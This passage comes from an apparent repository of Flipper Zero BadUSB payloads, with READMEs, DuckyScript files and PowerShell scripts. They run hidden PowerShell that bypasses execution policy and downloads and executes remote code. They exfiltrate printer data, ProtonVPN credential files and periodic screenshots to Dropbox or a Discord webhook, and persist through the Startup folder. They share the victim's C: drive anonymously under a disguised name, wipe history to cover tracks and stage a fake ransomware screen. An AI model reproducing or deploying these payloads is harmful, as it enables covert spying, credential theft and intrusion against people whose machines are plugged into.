$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
function Clean-Exfil {
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt"
Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1
DropBox-Upload -f $F1
Clean-Exfil
================================================
FILE: FlipperZero/payloads/Printer-Recon/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Printer-Recon/payload.txt
================================================
REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Priv-Paths/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
## Getting Started
### Dependencies
* Discord Webhook or other service that uses webhooks
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc
```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Priv-Paths/payload.txt
================================================
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
================================================
FILE: FlipperZero/payloads/Proton-Hog/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Proton-Hog
A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
## Description
This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
Then dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Proton-Hog/payload.txt
================================================
REM Title: Proton-Hog
REM Author: atomiczsec
REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Proton-Hog/s.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored
if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
try {
Write-Host "The VPN folder has not been found. "
}
catch {
throw $_.Exception.Message
}
}
else {
$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
cd $protonVpnPath
Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
Get-ChildItem | cd
# Upload user.config to dropbox
DropBox-Upload -f "user.config"
}
================================================
FILE: FlipperZero/payloads/Pwn-Drive/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Pwn-Drive
A payload to share the victims "C:" drive to the network.
## Description
This payload will share the entire victims "C:" drive to the entire network for further exploitation.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Pwn-Drive/c.ps1
================================================
#Pwn-Drive
#Enable Network Discovery
netsh advfirewall firewall set rule group=”network discovery” new enable=yes
#Enable File and Print
netsh firewall set service type=fileandprint mode=enable profile=all
#Setting Registry Values for allowing access to drive without credentials
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
#Sharing the Drive
New-SmbShare -Name "Windows Update" -Path "C:\"
================================================
FILE: FlipperZero/payloads/Pwn-Drive/payload.txt
================================================
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/RanFunWare/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# RanFunWare
A payload to prank your friends into thinking their computer got hit with ransomware.
## Description
This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/RanFunWare/payload.txt
================================================
REM Title: RanFunWare
REM Author: atomiczsec
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/RanFunWare/r.ps1
================================================
#Hides Desktop Icons
$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
Get-Process "explorer"| Stop-Process
#Changes Background
#URL For the Image of your choice (Wanna Cry Ransomware Background)
$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
Invoke-WebRequest $url -OutFile C:\temp\test.jpg
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class Wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper(string path)
{
SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
}
}
"@
Add-Type -TypeDefinition $setwallpapersrc
[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
#Pop Up Message
function MsgBox {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True)]
[Alias("m")]
[string]$message,
[Parameter (Mandatory = $False)]
[Alias("t")]
[string]$title,
[Parameter (Mandatory = $False)]
[Alias("b")]
[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
[string]$button,
[Parameter (Mandatory = $False)]
[Alias("i")]
[ValidateSet('None','Hand','Question','Warning','Asterisk')]
[string]$image
)
Add-Type -AssemblyName PresentationCore,PresentationFramework
if (!$title) {$title = " "}
if (!$button) {$button = "OK"}
if (!$image) {$image = "None"}
[System.Windows.MessageBox]::Show($message,$title,$button,$image)
}
MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
================================================
FILE: FlipperZero/payloads/Screen-Shock/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: FlipperZero/payloads/Screen-Shock/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Screen-Shock
This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
Then the contents will then be sent to the DropBox for viewing pleasure
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Screen-Shock/c.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
================================================
FILE: FlipperZero/payloads/Screen-Shock/payload.txt
================================================
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: FlipperZero/payloads/Screen-Shock/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Spotify-Spy/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Spotify-Spy
This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
## Description
Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Spotify-Spy/SS.ps1
================================================
#Spotify-Spy
# See if file is a thing
Test-Path -Path "$env:APPDATA\Spotify\Users"
#Create varible for file name
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt"
